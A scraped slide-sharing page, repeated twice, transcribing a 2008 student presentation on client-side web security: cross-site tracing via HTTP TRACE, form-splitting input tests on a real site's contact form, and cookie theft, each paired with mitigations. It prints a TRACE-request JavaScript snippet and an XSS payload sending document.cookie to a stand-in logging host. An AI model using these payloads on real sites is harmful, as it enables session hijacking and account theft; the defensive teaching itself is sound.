logging in or signing up Client-site Security sushil.rai Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 320 Category: Science & Tech.. License: All Rights Reserved Like it (0) Dislike it (0) Added: August 30, 2008 This Presentation is Public Favorites: 0 Presentation Description No description available. Comments Posting comment... By: jiten_nigam (16 month(s) ago) hi i m karan ...i like this presentation ..it's very helpful for me ..plz send it to my id karannigam482@gmail.com thanks... Saving..... Post Reply Close Saving..... Edit Comment Close Premium member Presentation Transcript “Client-site security” : “Client-site security” Project Guide Dr. Anurika Vaish By:- Sushil Rai IMS2007032 Goal of the Project : Goal of the Project This Project aims to find out the vulnerabilities on client site and perform the analysis in respect of secure client communication. This project also include the analysis of vulnerabilities on client site due to diligence and misconfiguration on client-server and also provide all kind of required recommendations to protect the client from attackers. Tools and platform : Tools and platform Tools : Wireshark 1.0 Platform: Linux/Windows Web server : Apache Domains of Network Security : Domains of Network Security Domains of Network Security Finding Vulnerabilities……. : Finding Vulnerabilities……. To find out the security loopholes I had applied two approaches which are as follows- Inserting input arguments (in form of script) in the address bar. Insert false parameter values in that input form value. Algorithm to find XSS- : Algorithm to find XSS- Using TRACE method. Insert false parameter values in that input form value. TRACE method is basically used for an input data ECHO mechanism for HTTP protocol. TRACE request is send to web server which support TRACE method, then web server will send back the result which contains requested information approached by user. Snap-shot by wireshark 1.0.0 : Snap-shot by wireshark 1.0.0 Now attacker can send the script to get respond from Trace method- : Now attacker can send the script to get respond from Trace method- <script type = text/javascript”> < function sendTrace(){ Xmlhttp =new ActiveXobject(“Microsoft.XMLhttp”); Xmlhttp.open(“TRACE”,”http://www,abc.com;false); Xmlhttp.send(); xmlDoc = xmlhttp.responsetext; alert(xmlDoc);} </script> Recommendation- : Recommendation- To disable the TRACE method system administrator needs to be added somewhere in your main apache config file outside of any host or directory config. RewriteEngine On RewriteCond % {REQUEST_METHOD} ^TRACE RewriteRule .* - [F] VULNERABILITY AGAINST FORM SPLITTING: : VULNERABILITY AGAINST FORM SPLITTING: Basically in this method we try to search the input points and pass the invalid inputs and check whether server is accepting it or not. If any invalid input is accepting by web server then that particular web application is vulnerable. I start navigation on pages of RIL one by one , but I was not getting any these kind of input fields but before ending of navigation I stick at last page which was CONTACT US, in this page 14 input fields as we can see it in below given snapshot Inserting malicious code as input- : Inserting malicious code as input- Malicious code is accepted by server- : Malicious code is accepted by server- Recommendations- : Recommendations- To protect an application from form-splitting attack we have to do – 1. Validation of all TCP headers. 2. Validation of all stored cookies. 3. Checking of all query strings. 4. Validation of all form fields. 5. Checking of all hidden fields. Stealing cookies- : Stealing cookies- Basically cookie stealing is one of the dangerous kind of attack which can be impose on client site by an attacker. Steps are – Finding a XSS vulnerability. Creating cookie stealer script. Logging the cookie like – http://www.xyz.com/search.php?query=”><script>location.href=’http://abc.com/log.php?12386’+document.cookie;</script> Cookie in plain alpha-numeric form- : Cookie in plain alpha-numeric form- Recommendations- : Recommendations- 1.Implementation of cookie timeout. 2. The proper authentication of cookie credentials must be associated to an IP address. 3. We must provide proper availability of log-out functions. 4. Do not store cookies in form of plain text. 5. Do not store weekly encrypted passwords in cookies. Web browser based Security : Web browser based Security To protect the web browser we have to make some settings which are given below- Select “ask me every time before accepting cookie from web site”. Select “ warn me when sites try to install plug ins”. Disable the check box of “ enable JavaScript” and “enable java”. Disable all check boxes of “ advance JavaScript settings” : Thank You !! You do not have the permission to view this presentation. In order to view it, please contact the author of the presentation.
Client-site Security sushil.rai Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 320 Category: Science & Tech.. License: All Rights Reserved Like it (0) Dislike it (0) Added: August 30, 2008 This Presentation is Public Favorites: 0 Presentation Description No description available. Comments Posting comment... By: jiten_nigam (16 month(s) ago) hi i m karan ...i like this presentation ..it's very helpful for me ..plz send it to my id karannigam482@gmail.com thanks... Saving..... Post Reply Close Saving..... Edit Comment Close Premium member Presentation Transcript “Client-site security” : “Client-site security” Project Guide Dr. Anurika Vaish By:- Sushil Rai IMS2007032 Goal of the Project : Goal of the Project This Project aims to find out the vulnerabilities on client site and perform the analysis in respect of secure client communication. This project also include the analysis of vulnerabilities on client site due to diligence and misconfiguration on client-server and also provide all kind of required recommendations to protect the client from attackers. Tools and platform : Tools and platform Tools : Wireshark 1.0 Platform: Linux/Windows Web server : Apache Domains of Network Security : Domains of Network Security Domains of Network Security Finding Vulnerabilities……. : Finding Vulnerabilities……. To find out the security loopholes I had applied two approaches which are as follows- Inserting input arguments (in form of script) in the address bar. Insert false parameter values in that input form value. Algorithm to find XSS- : Algorithm to find XSS- Using TRACE method. Insert false parameter values in that input form value. TRACE method is basically used for an input data ECHO mechanism for HTTP protocol. TRACE request is send to web server which support TRACE method, then web server will send back the result which contains requested information approached by user. Snap-shot by wireshark 1.0.0 : Snap-shot by wireshark 1.0.0 Now attacker can send the script to get respond from Trace method- : Now attacker can send the script to get respond from Trace method- <script type = text/javascript”> < function sendTrace(){ Xmlhttp =new ActiveXobject(“Microsoft.XMLhttp”); Xmlhttp.open(“TRACE”,”http://www,abc.com;false); Xmlhttp.send(); xmlDoc = xmlhttp.responsetext; alert(xmlDoc);} </script> Recommendation- : Recommendation- To disable the TRACE method system administrator needs to be added somewhere in your main apache config file outside of any host or directory config. RewriteEngine On RewriteCond % {REQUEST_METHOD} ^TRACE RewriteRule .* - [F] VULNERABILITY AGAINST FORM SPLITTING: : VULNERABILITY AGAINST FORM SPLITTING: Basically in this method we try to search the input points and pass the invalid inputs and check whether server is accepting it or not. If any invalid input is accepting by web server then that particular web application is vulnerable. I start navigation on pages of RIL one by one , but I was not getting any these kind of input fields but before ending of navigation I stick at last page which was CONTACT US, in this page 14 input fields as we can see it in below given snapshot Inserting malicious code as input- : Inserting malicious code as input- Malicious code is accepted by server- : Malicious code is accepted by server- Recommendations- : Recommendations- To protect an application from form-splitting attack we have to do – 1. Validation of all TCP headers. 2. Validation of all stored cookies. 3. Checking of all query strings. 4. Validation of all form fields. 5. Checking of all hidden fields. Stealing cookies- : Stealing cookies- Basically cookie stealing is one of the dangerous kind of attack which can be impose on client site by an attacker. Steps are – Finding a XSS vulnerability. Creating cookie stealer script. Logging the cookie like – http://www.xyz.com/search.php?query=”><script>location.href=’http://abc.com/log.php?12386’+document.cookie;</script> Cookie in plain alpha-numeric form- : Cookie in plain alpha-numeric form- Recommendations- : Recommendations- 1.Implementation of cookie timeout. 2. The proper authentication of cookie credentials must be associated to an IP address. 3. We must provide proper availability of log-out functions. 4. Do not store cookies in form of plain text. 5. Do not store weekly encrypted passwords in cookies. Web browser based Security : Web browser based Security To protect the web browser we have to make some settings which are given below- Select “ask me every time before accepting cookie from web site”. Select “ warn me when sites try to install plug ins”. Disable the check box of “ enable JavaScript” and “enable java”. Disable all check boxes of “ advance JavaScript settings” : Thank You !!